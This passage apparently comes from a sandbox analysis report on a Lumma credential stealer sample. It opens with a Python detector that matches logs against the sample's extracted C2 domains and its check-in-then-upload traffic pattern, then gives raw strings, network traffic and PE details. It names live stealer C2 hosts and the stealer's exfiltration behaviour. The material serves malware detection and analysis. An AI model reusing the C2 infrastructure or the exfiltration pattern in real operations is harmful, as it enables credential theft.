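The network evidence above is of two kinds: indicator matches (DNS lookups and TLS SNI for names from the extracted configuration) and behaviour (POST /api under a Chrome/119 User-Agent, first two small application/x-www-form-urlencoded bodies of 8 and 47 bytes, then multipart/form-data uploads of 1 KB to 570 KB to the same host). The Python below is an added example, not code from the report, from Joe Sandbox or from the sample: it applies both kinds of check to proxy and DNS log lines. The one-event-per-line log format and the log lines are constructed for the example; the configuration dictionary is copied from the report; the 64-byte beacon threshold is an assumption.

```python
from collections import defaultdict

# C2 hostnames and build id exactly as the report's configuration extractor printed them.
LUMMA_CONFIG = {
    "C2 url": ["necklacebudi.lat", "crosshuaht.lat", "aspecteirs.lat", "sustainskelet.lat",
               "grannyejh.lat", "sweepyribs.lat", "rapeflowwj.lat", "discokeyus.lat", "energyaffai.lat"],
    "Build id": "PsFKDg--pablo",
}

# Constructed log (not the report's pcap) in a simplified one-event-per-line form:
#   dns  <client> <query name>
#   http <client> <method> <host> <path> <content-type> <content-length>
# The discokeyus.lat lines mirror request sizes the report lists; the other hosts are filler.
SAMPLE_LOG = """\
dns  192.168.2.4 sweepyribs.lat
dns  192.168.2.4 grannyejh.lat
dns  192.168.2.4 discokeyus.lat
dns  192.168.2.4 www.msftconnecttest.com
http 192.168.2.4 POST discokeyus.lat /api application/x-www-form-urlencoded 8
http 192.168.2.4 POST discokeyus.lat /api application/x-www-form-urlencoded 47
http 192.168.2.4 POST discokeyus.lat /api multipart/form-data 18121
http 192.168.2.4 POST discokeyus.lat /api multipart/form-data 570728
http 192.168.2.4 POST cdn.example.net /api application/x-www-form-urlencoded 8
http 192.168.2.4 GET  www.msftconnecttest.com /connecttest.txt - 0
"""


def parse_log(text: str) -> list:
    events = []
    for line in text.splitlines():
        f = line.split()
        if len(f) == 3 and f[0] == "dns":
            events.append({"kind": "dns", "src": f[1], "host": f[2].lower().rstrip(".")})
        elif len(f) == 7 and f[0] == "http":
            events.append({"kind": "http", "src": f[1], "method": f[2], "host": f[3].lower(),
                           "path": f[4], "ctype": f[5].lower(), "length": int(f[6])})
    return events


def matches_c2(host: str, c2_domains) -> bool:
    """Exact or subdomain match, so a.discokeyus.lat is caught but notdiscokeyus.lat is not."""
    return any(host == d or host.endswith("." + d) for d in c2_domains)


def find_c2_contacts(events, c2_domains) -> list:
    """Indicator match: DNS lookups and HTTP requests whose name is in the extracted C2 list."""
    return [e for e in events if matches_c2(e["host"], c2_domains)]


def find_checkin_then_upload(events, max_beacon_bytes: int = 64) -> dict:
    """Behavioural match, independent of the indicator list: per host, one or more small
    form-urlencoded POSTs to /api (the check-in) followed by multipart POSTs to the same
    path (the uploads). A host is reported only when both phases occur in that order."""
    state = defaultdict(lambda: {"beacons": 0, "uploads": 0, "bytes_uploaded": 0})
    for e in events:
        if e["kind"] != "http" or e["method"] != "POST" or e["path"] != "/api":
            continue
        st = state[e["host"]]
        if e["ctype"] == "application/x-www-form-urlencoded" and e["length"] <= max_beacon_bytes:
            st["beacons"] += 1
        elif e["ctype"].startswith("multipart/form-data") and st["beacons"]:
            st["uploads"] += 1
            st["bytes_uploaded"] += e["length"]
    return {h: dict(s) for h, s in state.items() if s["uploads"]}


def report(text: str = SAMPLE_LOG, config: dict = LUMMA_CONFIG) -> dict:
    events = parse_log(text)
    return {"c2_contacts": find_c2_contacts(events, config["C2 url"]),
            "checkin_then_upload": find_checkin_then_upload(events)}
```

The behavioural check is what survives a change of domains, which a MaaS operator rotates cheaply. Note also that the decrypted string TeslaBrowser/5.5 is not the User-Agent this run actually sent (the captured requests carry a Chrome/119 string), so a detection keyed on the user agent alone would have missed this traffic.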
Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: gJkNLYV0ax.exe, 00000000.00000003.1998932614.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998797783.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998637407.00000000019E5000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1917303362.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2084411862.0000000001A2F000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2027466840.00000000019F1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro0
Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: gJkNLYV0ax.exe, 00000000.00000003.1963875994.00000000060CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: gJkNLYV0ax.exe, 00000000.00000003.1993681289.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995668126.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993011563.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993362306.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995975300.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1992273154.0000000006082000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998731158.0000000006089000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: gJkNLYV0ax.exe, 00000000.00000003.1993681289.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995668126.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993011563.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993362306.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995975300.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1992273154.0000000006082000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998731158.0000000006089000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: gJkNLYV0ax.exe, 00000000.00000003.1993681289.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995668126.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993011563.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993362306.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995975300.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1992273154.0000000006082000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998731158.0000000006089000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: gJkNLYV0ax.exe, 00000000.00000003.2084411862.0000000001A41000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1963481216.000000000608F000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000002.2085788889.0000000001A68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/
Source: gJkNLYV0ax.exe, 00000000.00000003.1917456355.00000000019C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/M
Source: gJkNLYV0ax.exe, 00000000.00000003.1917303362.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000002.2087129404.0000000006080000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/api
Source: gJkNLYV0ax.exe, 00000000.00000002.2087129404.0000000006080000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/apiKed5
Source: gJkNLYV0ax.exe, 00000000.00000003.1917303362.00000000019F1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/apiQx
Source: gJkNLYV0ax.exe, 00000000.00000003.1998932614.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998797783.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998637407.00000000019E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/apiU2
Source: gJkNLYV0ax.exe, 00000000.00000002.2085682261.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2084563810.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.2027466840.00000000019F1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/apiby
Source: gJkNLYV0ax.exe, 00000000.00000002.2085484486.00000000019A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/apid
Source: gJkNLYV0ax.exe, 00000000.00000003.1917456355.00000000019BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/t
Source: gJkNLYV0ax.exe, gJkNLYV0ax.exe, 00000000.00000003.2025868617.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000002.2085606475.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998637407.00000000019C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat:443/api
Source: gJkNLYV0ax.exe, 00000000.00000003.2025868617.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1917456355.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000002.2085606475.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998637407.00000000019C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat:443/api5
Source: gJkNLYV0ax.exe, 00000000.00000003.2025868617.00000000019C2000.00000004.00000020.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000002.2085606475.00000000019C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat:443/apifqs92o4p.default-release/key4.dbPK
Source: gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: gJkNLYV0ax.exe, 00000000.00000003.1993681289.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995668126.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993011563.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993362306.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995975300.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1992273154.0000000006082000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998731158.0000000006089000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXf
                Source: gJkNLYV0ax.exe, 00000000.00000003.1993681289.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995668126.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993011563.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993362306.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995975300.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1992273154.0000000006082000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998731158.0000000006089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvnwP44
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918843535.00000000060E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: gJkNLYV0ax.exe, 00000000.00000003.1965537429.00000000061A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: gJkNLYV0ax.exe, 00000000.00000003.1965537429.00000000061A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918843535.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1941252262.00000000060D9000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1941148892.00000000060D9000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918935202.00000000060D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918935202.00000000060B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918843535.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1941252262.00000000060D9000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1941148892.00000000060D9000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918935202.00000000060D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918935202.00000000060B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: gJkNLYV0ax.exe, 00000000.00000003.1917456355.00000000019C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sweepyribs.lat:443/api
                Source: gJkNLYV0ax.exe, 00000000.00000003.1993681289.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995668126.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993011563.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1993362306.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1995975300.0000000006083000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1992273154.0000000006082000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1998731158.0000000006089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&r
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: gJkNLYV0ax.exe, 00000000.00000003.1918466452.00000000060CD000.00000004.00000800.00020000.00000000.sdmp, gJkNLYV0ax.exe, 00000000.00000003.1918537729.00000000060CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: gJkNLYV0ax.exe, 00000000.00000003.1965537429.00000000061A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: gJkNLYV0ax.exe, 00000000.00000003.1965537429.00000000061A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: gJkNLYV0ax.exe, 00000000.00000003.1965537429.00000000061A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: gJkNLYV0ax.exe, 00000000.00000003.1965537429.00000000061A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: gJkNLYV0ax.exe, 00000000.00000003.1965537429.00000000061A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:49743 version: TLS 1.2

                System Summary

                Source: gJkNLYV0ax.exe | Static PE information: section name:
                Source: gJkNLYV0ax.exe | Static PE information: section name: .idata
                Source: gJkNLYV0ax.exe | Static PE information: section name:
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_01A586F5
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_01A586F5
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_01A4B4B5
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_01A4B3F3
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_01A586F5
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Code function: 0_3_01A586F5
                Source: gJkNLYV0ax.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: gJkNLYV0ax.exe | Static PE information: Section: ZLIB complexity 0.9974248180650684
                Source: gJkNLYV0ax.exe | Static PE information: Section: iyigrnpu ZLIB complexity 0.9949096315298508
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@3/1
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: gJkNLYV0ax.exe, 00000000.00000003.1919012632.0000000006086000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: gJkNLYV0ax.exe | Virustotal: Detection: 57%
                Source: gJkNLYV0ax.exe | ReversingLabs: Detection: 65%
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | File read: C:\Users\user\Desktop\gJkNLYV0ax.exe
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: webio.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Section loaded: ondemandconnroutehelper.dll
                Source: gJkNLYV0ax.exe | Static file information: File size 1880064 > 1048576
                Source: gJkNLYV0ax.exe | Static PE information: Raw size of iyigrnpu is bigger than: 0x100000 < 0x1a2c00

                Data Obfuscation

                Source: C:\Users\user\Desktop\gJkNLYV0ax.exe | Unpacked PE file: 0.2.gJkNLYV0ax.exe.e60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iyigrnpu:EW;tggmxbsn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iyigrnpu:EW;tggmxbsn:EW;.taggant:EW;
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: gJkNLYV0ax.exe | Static PE information: real checksum: 0x1d7f0c should be: 0x1d3b96
                Source: gJkNLYV0ax.exe | Static PE information: section name:
                Source: gJkNLYV0ax.exe | Static PE information: section name: .idata
